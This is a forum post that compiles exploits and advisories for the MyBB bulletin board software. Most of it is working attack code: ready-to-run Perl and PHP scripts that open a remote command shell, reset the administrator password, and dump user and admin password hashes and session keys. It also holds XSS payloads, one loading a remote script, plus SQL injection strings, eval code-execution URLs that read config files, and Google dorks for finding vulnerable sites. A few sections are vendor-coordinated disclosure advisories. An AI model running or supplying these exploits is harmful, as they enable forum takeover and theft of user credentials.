Guest expl0iter

All Vuln on MyBB !


# MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML Injection

MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML Injection

http://www.mybb.com

12-12-2010


Poc: http://infectionsupport.com/tags.php?tag="><script>alert(String.fromCharCode(88,83,83))</script>

http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s></script>

Google dork: powered by mybb inurl:tags.php?tag=


by Teamelite (Methodman) http://nemesis.te-home.net

# MyBB 1.6 <= Cross Site Scripting (XSS) Vulnerability

============================================
MyBB 1.6 <= Cross Site Scripting (XSS) Vulnerability
============================================


1. OVERVIEW

MyBB was vulnerable to Cross Site Scripting Vulnerability.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

Two XSS vulnerabilities were found. One is user-driven XSS on "url" parameter.
User will get xssed upon successful log-in.
The other is a reflected XSS on "posthash" parameter where the valid
tid (topic id) is required for successful attack.
The anti-CSRF check against "my_post_key" parameter was not done in
thread/post preview mode and thus there came a way for XSS to be
successful.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

User-driven XSS
http://attacker.in/mybb/member.php?action=login&url=javascript:alert%28/XSS/%29

Reflected XSS
http://attacker.in/mybb/newreply.php?my_post_key=&subject=XSS&action=do_newreply&posthash="><script>alert(/XSS/)</script>&quoted_ids=&lastpid=1&from_page=1&tid=1&method=quickreply&message=test&previewpost=Preview Post


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_cross_site_scripting
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-20]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

# MyBB 1.6 <= SQL Injection Vulnerability

=================================
MyBB 1.6 <= SQL Injection Vulnerability
=================================



1. OVERVIEW

Potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The "keywords" parameter was not properly sanitized in /private.php
and /search.php which leads to SQL Injection vulnerability.
Full exploitation possibility is probably mitigated by clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

=> /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1


=> /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-24]


---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

# mybb v1.4.8 search.php blind/query based sql injection vulns

##########################
# mybb v1.4.8 search.php blind/query based sql injection vulns
# author: $qL_DoCt0r
# msn: sidthesloth@windowslive.com
# blog: http://full-discl0sure.blogspot.com
# moderator of: http://hackwarez.net
##########################
search.php fails to correctly sanitise the user input validation allowing
error based and query based sql injection to discreetly extract
undisclosed information from the sql database

simple query: ' or 1=1--
blind query: ' having 1=1--
must be registered on forum with 2+ posts for this to work

solution: simply add a simple sanitiser for $sqlstring and the search
input variable!
#GREETINGS: TheMindRapist ~ Qabandi ~ Mr.SQL ~ WEbDEvil



# MyBB version 1.1.2

#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flooding my Inbox you *****!
#
# - First you need to create the special user to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
# this step needs a graphic confirmation so the exploit writes a file
# in /tmp/file.png, you need to
# see this img and put the text into the prompt. If everything is ok,
# you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
# for debugging.
# - After you have created the exploit or if you have a valid non common
# user, you can execute shell commands.
#
# TIPS:
# * Sometimes you have to change the thread Id, --tid is your friend
# * Don't forget to change the email. You MUST activate the account.
# * Better karate, even inside yourself.
#
# LIMITATIONS:
# * If the admin's username length is < 28 this exploit doesn't work
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # you can choose this or another one.

my ($proxy, $proxy_user, $proxy_pass, $username);
my ($host, $debug, $dir, $command, $del, $first_time);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug,
'1' => \$first_time,
'tid=s' => \$tid,
'delete' => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
$host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
cookie_jar => { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
login() if !$logged;

print "mybibi> "; # lost connection
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub send {
chomp (my $cmd = shift);
my $h = $host.$dir."/newthread.php";
my $req = POST $h, [
'subject' => '514',
'message' => '/slap 514',
'previewpost' => 'Preview Post',
'action' => 'do_newthread',
'fid' => $tid,
'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
];
$req->header($uservar => $cmd);
print $req->as_string() if $debug;
my $res = $ua->request($req);
if ($res->content =~ /You may not post in this/) {
print "[!] don't have perms to post. Change the Forum ID\n";
} else {
my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
print $data;
}

}
sub login {
my $h = $host.$dir."/member.php";
my $req = POST $h,[
'username' => $username,
'password' => $password,
'submit' => 'Login',
'action' => 'do_login'
];
my $res = $ua->request($req);
if ($res->content =~ /You have successfully been logged/is) {
print "[*] Login successful!\n";
$logged = 1;
} else {
print "[!] Error login-in\n";
}
}

sub help {
print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}

sub create_user {
# first we need to get the img.
my $h = $host.$dir."/member.php";
print "Host: $h\n";

$req = HTTP::Request->new (GET => $h."?action=register");
$res = $ua->request ($req);

my $req = POST $h, [
'action' => "register",
'agree' => "I Agree"
];
print $req->as_string() if $debug;
$res = $ua->request($req);

my $content = $res->content();
$content =~ m/.*(image\.php\?action.*?)\".*/is;
my $img = $1;
my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
$res = $ua->request ($req);
print $req->as_string();

if ($res->content) {
open (TMP, ">/tmp/file.png") or die($!);
print TMP $res->content;
close (TMP);
print "[*] /tmp/file.png created.\n";
}

my ($hash) = $img =~ m/hash=(.*?)$/;
my $img_str = get_img_str();
unlink ("/tmp/file.png");
$img_str =~ s/\n//g;
my $req = POST $h, [
'username' => $username,
'password' => $password,
'password2' => $password,
'email' => $email,
'email2' => $email,
'imagestring' => $img_str,
'imagehash' => $hash,
'allownotices' => 'yes',
'receivepms' => 'yes',
'pmpopup' => 'no',
'action' => "do_register",
'regsubmit' => "Submit Registration"
];
$res = $ua->request($req);
print $req->as_string() if $debug;

open (OUT, ">mybibi_out.html");
print OUT $res->content;

print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str () {
print "\nNow I need the text shown in /tmp/file.png: ";
my $str = <STDIN>;
return $str;
}
exit 0;

# MyBulletinBoard version 1.00RC4 and prior

#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\n Example:\nperl $0 http://www.example.com/mybb/ 1\n";
exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,". "null,null,null,password,null%20FROM%20". "mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# MyBB finduser Search SQL Injection

#!/usr/bin/perl
###########################################
# Crouz.Com Security Team
###########################################
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability
#
# Expl0it By: A l p h a _ P r o g r a m m e r (sirius)
# Email: Alpha_Programmer@LinuxMail.ORG
#
# This Xpl Change Admin's Pass For L0gin With P0wer User
#
# HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln
#
###########################################
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular)
#
# Special Lamerz : Hoormazd & imm02tal ++ xshabgardx
###########################################
use IO::Socket;

if (@ARGV < 2) {
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <T4rg3t> <DIR>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " Mybb.pl www.Site.com /mybb/ \n";
exit();
}

my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";


print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);

print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy \n\n";

Exploits #2:
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#########[ MyBB SQL-Injection ]##############\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "######################### #########\n";
exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";

$page =~ m/<a href="member\.php\?action=profile&\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);

$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}

# MyBB version 1.04 and prior

#!/usr/bin/perl -w

# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
# http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat >
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;

##-- Start --#

$host = "127.0.0.1";
$path = "/mybb3/";
$userid = 1;
$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";

##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# MyBB Dir On Server | exm. /mybb/
#
# $userid :-
# The ID Of The User U Wanna To Get His Loginkey
#
# $cookie :-
# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#
# $cookie = "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Failed");
##-- DONT TRY TO EDIT ME --##
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";

print $sock $evildata;

while($ans = <$sock>){
$ans =~ m/<a href=\"member.php\?action=profile&uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}

#EoF

# MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit written by c411k (no brute-forcing one symbol at a time: inserts the hash into your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin_sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin_loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru b00zy/br 32sm. <====3 oO ( .)(. ) root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08

error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);

header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");

?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
margin="5";
FONT-WEIGHT: normal;
COLOR: #B9B9BD;
BACKGROUND: #44474F;
FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}

-->
</style>
</head>
<body>

<?php

function myflush($timee)
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
}

if (!$_GET)
{
echo
'<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value="?get admin passwd...?"><br><br>
<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
<font color="#B9B9BD">&lt;- for example "expdb.cc"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
<font color="#B9B9BD">&lt;- path to the mybb forum, for example "community/mybb"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
<font color="#B9B9BD">&lt;- your username on this forum, for example "c411k"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
<font color="#B9B9BD">&lt;- your password, for example "h1world"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
<font color="#B9B9BD">&lt;- admin id, default 1<br>
</form>';
}


if (isset($_GET['fuck_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';

function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
}

echo '<pre>- start....';
myflush(50000);

$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);

foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
echo '<pre>- cookie: '.$cookie;
myflush(50000);

preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '<pre>- user id: '.$get_uid;
myflush(50000);

$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '<pre>- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
}


?>

</body>
</html>

# MyBB Plugin Custom Pages 1.0 Remote SQL Injection Vulnerability

###################################################################################
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability
#
# found by: Lidloses_Auge
# Greetz to: free-hack.com
###################################################################################
# Vulnerability:
#
#   Document: pages.php
#   GET-Parameter: page
#
# Dork:
#
#   inurl:"pages.php" + intext:"powered by mybb"
#
# Example:
#
#   http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/*
#
# Notes:
#
#   Success rate depends on the permissions which could be set for viewing the 'page'
###################################################################################

# MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

#!/usr/bin/perl

#
# MyBB <=1.2.11 SQL Injection Exploit based on http://www.waraxe.us/advisory-64.html
#
# Needs MySQL >=4.1 and a valid registration.
#
# By F
#

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use HTML::Entities;

####

print("\n");
print("############################################################################\n");
print("# MyBB <=1.2.11 SQL Injection Exploit by F #\n");
print("############################################################################\n");

if(@ARGV<5){
print("# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] #\n");
print("############################################################################\n");
exit;
};

$host="http://".$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$pass=$ARGV[3];
$vid1=$ARGV[4];

if(@ARGV<=5){
$vidn=$vid1;
}else{
$vidn=$ARGV[5];
};

print("\n");
print(" [~] Host: ".$host."\n");
print(" [~] Path: ".$path."\n");
print(" [~] User: ".$user."\n");
print(" [~] Pass: ".$pass."\n");
print(" [~] From #".$vid1."\n");
print(" [~] To #".$vidn."\n");
print("\n");

####

# create $browser and $cookie_jar
$browser=LWP::UserAgent->new() or die(" [-] Cannot create new UserAgent\n");
$cookie_jar=HTTP::Cookies->new();
$browser->cookie_jar($cookie_jar);

# try to log in
$result=$browser->post(
$host.$path."member.php",
Content=>[
"action"=>"do_login",
"username"=>$user,
"password"=>$pass,
"url"=>$host.$path."index.php",
"submit"=>"Login",
],
);

# check cookie
if($cookie_jar->as_string=~m/mybbuser=.*?;/){
print(" [+] Login successful\n");
}else{
print(" [-] Login unsuccessful\n");
exit;
};

# try to get uid
$result=$browser->get($host.$path."usercp.php");

# check result
if($result->as_string=~m/member\.php\?action=profile&uid=([0-9]*?)"/){
$uid=$1;
print(" [+] Getting uid successful: ".$uid."\n");
}else{
print(" [-] Getting uid unsuccessful\n");
exit;
};

# construct exploit
$exploit ="yes','0','0'),";
$exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_result','0',concat('(haxx_start)',";
for($vid=$vid1;$vid<=$vidn;$vid++){
$exploit.="ifnull((select concat(uid,'-',username,':',password,':',salt,'::',email,'-',usergroup,'-',additionalgroups,'-',website,'-',regip,'(haxx_delim)') from mybb_users where uid=".$vid."),''),";
};
$exploit.="'(haxx_end)'),'".time()."','0','no','yes";

# try to send exploit
$result=$browser->post(
$host.$path."private.php",
Content=>[
"action"=>"do_send",
"subject"=>"haxx_message=".(1+rand(65536)),
"message"=>"nuthin".(1+rand(65536)),
"to"=>$user,
"options[disablesmilies]"=>$exploit,
],
);

# check if user is valid
if( ($result->as_string=~m/Your account has either been suspended or you have been banned from accessing this resource\./) ||
($result->as_string=~m/You do not have permission to access this page\./) ||
($result->as_string=~m/Your account may still be awaiting activation or moderation\./)
){
print(" [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons.\n");
exit;
};

# check the 5 minute cap
if($result->as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes\./){
print(" [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again.\n");
exit;
};

# delete auxiliary message
$result=$browser->get($host.$path."private.php?fid=1");
if($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_message=[0-9]*?</){
print(" [+] The auxiliary message was found and successfully deleted\n");
$pmid=$1;
$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
}else{
print(" [-] Warning! The auxiliary message wasn't found and could not be deleted!\n");
};

# download and delete result message
if($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_result</){
print(" [+] The result message was found. Getting hashes.\n\n");
$pmid=$1;
$result=$browser->get($host.$path."private.php?action=read&pmid=".$pmid);
if($result->as_string=~m/\(haxx_start\)(.*)\(haxx_end\)/s){
$pm=$1;
$pm=~s/\(haxx_delim\)/\n/g;
$pm=~s/<br \/>//g;
$pm=decode_entities($pm);
print($pm);
};
$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
}else{
print(" [-] The result message wasn't found. Exploit failed!\n");
exit;
};

# MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities

[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10
===============================================================================

Author: Janek Vind "waraxe"
Independent discovery: koziolek
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-61.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MyBB is a discussion board that has been around for a while; it has evolved
from other bulletin boards into the forum package it is today. Therefore,
it is a professional and efficient discussion board, developed by an active
team of developers.

Vulnerabilities discovered
===============================================================================

1. Remote Code Execution in "forumdisplay.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: valid forum "fid" must be known.
Attacker doesn't need to have any privileges in mybb installation to be
successful in attack.

Proof-Of-Concept request:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

... and we will see error message:

Parse error: syntax error, unexpected ''', expecting ']' in
C:\apache_wwwroot\mybb.1.2.10\forumdisplay.php(407) : eval()'d code on line 1

Problematic piece of code is related to "eval()" function:

eval("\$orderarrow['$sortby'] = \"".
$templates->get("forumdisplay_orderarrow")."\";");


Example attacks:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//


2. Remote Code Execution in "search.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: search "sid" must be known - but that's a trivial task.
Attacker doesn't need to have any privileges in mybb installation to be
successful in attack.

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='

Parse error: syntax error, unexpected ''', expecting ']' in
C:\apache_wwwroot\mybb.1.2.10\search.php(141) : eval()'d code on line 1

The problematic code is exactly the same piece as in the previous case:

eval("\$orderarrow['$sortby'] = \"".
$templates->get("forumdisplay_orderarrow")."\";");

Example attacks:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];readfile('inc/config.php');exit;//

Both remote code execution security holes are very dangerous and can be
used by an attacker to completely take over the website and possibly
totally compromise the web server.

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Download MyBB new version 1.2.11 as soon as possible!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

